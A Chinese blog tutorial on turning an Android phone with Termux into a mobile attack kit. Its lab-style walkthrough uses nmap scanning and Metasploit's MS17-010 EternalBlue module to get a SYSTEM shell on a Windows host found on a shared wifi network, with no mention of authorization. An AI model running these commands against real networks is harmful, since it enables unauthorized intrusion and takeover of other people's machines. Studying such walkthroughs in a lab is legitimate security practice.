termux使用教程python手机_渗透测试|利用手机攻击电脑(Termux终端初体验)
至少我们曾经在一起过。
来自:一言
介绍
Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等。随着智能设备的普及和性能的不断提升,如今的手机、平板等的硬件标准已达到了初级桌面计算机的硬件标准,用心去打造完全可以把手机变成一个强大的工具.
前言
Termux终端安装在安卓手机上,就相当于是一个便携式服务器,可以下载Metasploit,Nmap,Sqlmap,hydra等渗透测试工具,可以走到哪儿扫到哪儿,舒服就完事了[aru_23],等于一个移动kali。
环境模拟
当你拿着手机连上一个wifi,通过扫描发现局域网内存在一台在线的电脑,并且存在漏洞,所以需要进行一些简单的扫描渗透测试,所以就要利用到Termux来实现,拿到目标权限。[aru_32]
安卓手机ip:192.168.2.100
目标主机ip:未知
测试开始
1.先使用nmap扫描局域网内存活的主机。
nmap -sP 192.168.2.0/24
温馨提示
通过扫描可以知道,IP:192.168.2.1 是路由器地址,IP:192.168.2.100 是我们手机地址,IP:192.168.2.106 是目标地址
2.探测目标主机详细信息,可以用-A
nmap -A 192.168.2.106
温馨提示
通过nmap扫描可以知道目标主机是win2008系统(ps:没有win7的镜像~就用这个演示一下[aru_15]),并且开启了smb服务,所以我们可以试试扫描目标主机是否存在ms17-010漏洞
3.利用Metasploit扫描目标是否存在漏洞
msfconsole #进入Metasploit
search ms17-010 #搜索漏洞
use auxiliary/scanner/smb/smb_ms17-010 #使用ms17-010扫描服务
set rhost 192.168.2.106 #设置目标地址
run #执行
经过扫描,目标存在ms17-010漏洞,接下来就可以直接利用漏洞反弹shell了
4.反弹shell
use exploit/windows/smb/ms17_010_eternalblue #使用该漏洞
set rhost 192.168.2.106 #设置目标
run #执行
温馨提示
这里就攻击成功,直接反弹shell了,并且权限为system权限。[aru_15]
总结
又水了一篇文章~这个教程就是简单的演示一下如何用手机使用Metasploit等工具进行渗透测试,并且还可以使用sqlmap,走到哪儿注入到哪儿[aru_17]
termux使用教程python手机_渗透测试|利用手机攻击电脑(Termux终端初体验)相关推荐
- http referer 验证防御方法_渗透测试 跨站攻击防御与安全检测手法剖析
上一节讲到了渗透测试中xss跨站攻击检测方法和防护,这一节也是关于跨站攻击的另一个手法CSRF,很多客户找到我们想要了解更多的跨站攻击检测方法以及防御此类攻击的办法,想要让网站的安全性更加坚固,对此提 ...
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...
- 基于Android设备的Kali Linux渗透测试教程第1章渗透测试
基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问 ...
- MSF渗透测试android手机
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调: ...
- Kali渗透测试:拒绝服务攻击
Kali渗透测试:拒绝服务攻击 故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击.拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一.其实对网络带 ...
- python开发转行渗透测试_月薪45K的大牛用Python开发一款密码攻击测试器!密码形同虚设!...
Python编写渗透测试探测工具 小编给大家推荐一个学习氛围超好的地方,Python学业交流:103456743!四千多小伙伴了吧!所以看到了快点进来吧,不然就满了!里面资料都是大家贡献的,几百个G了 ...
- 使用Python编写一个渗透测试探测工具
本篇将会涉及: 资源探测 一个有用的字典资源 第一个暴力探测器 文章首发:zmister.com/archives/18- 资源探测 资源探测在渗透测试中还是属于资源的映射和信息的收集阶段. 主要有以 ...
- hikaridatasource 加密后登陆不上_渗透测试 | 突破前端JS加密限制
前言 现在前端开发为了提高爬虫的难度及加强安全性,都会在数据包提交前进行加密,最典型的就是传参加密,相信大家在测试的时候都遇到过,那么我们在抓取数据包并修改之后,修改之后的参数无法通过后端程序数据完整 ...
- DVWA 不跳转_渗透测试入门-DVWA应用渗透软件安装与使用
简介:DVWA是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用程序,其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助运维人员掌握基本的安全测试知识,帮助Web开发人员更 ...
最新文章
- ESXi6.5环境搭建(二:ESXi 6.5环境的安装及配置)
- GoCart 分类和产品 测试一
- CSS3之伪元素选择器和伪类选择器
- Go语言在Linux环境下输出彩色字符
- android10热点验证身份,在 Android 上使用 Microsoft 进行身份验证
- nodejs 实现文件拷贝
- PHP 开启或关闭错误提示
- 计算机网络客户服务器应用,计算机网络工程教学资料-项目九 Internet服务器应用.pptx...
- Linux LiveCD:从CD光盘运行Linux
- java development kie_java – 直接从存储库加载Drools/KIE Workbench工件
- asp.net mvc5+Echarts3.0+AspNet.SignalR2.0 实时监控cpu占用率推送
- 实现Springboot整合UReport2
- 速达服务器应用程序错误,速达软件错误集锦及解决方法
- Poker2的Programmer Dvorak解决方案
- printf()输出格式
- php模拟登陆青果教务系统
- datatables分页,排序,ajax请求等参数设置
- ubuntu 下的 dnw 下载安装和使用
- 申请成为第三方支付公司的基本条件
- Spring Cloud Alibaba - 27 Gateway源码解析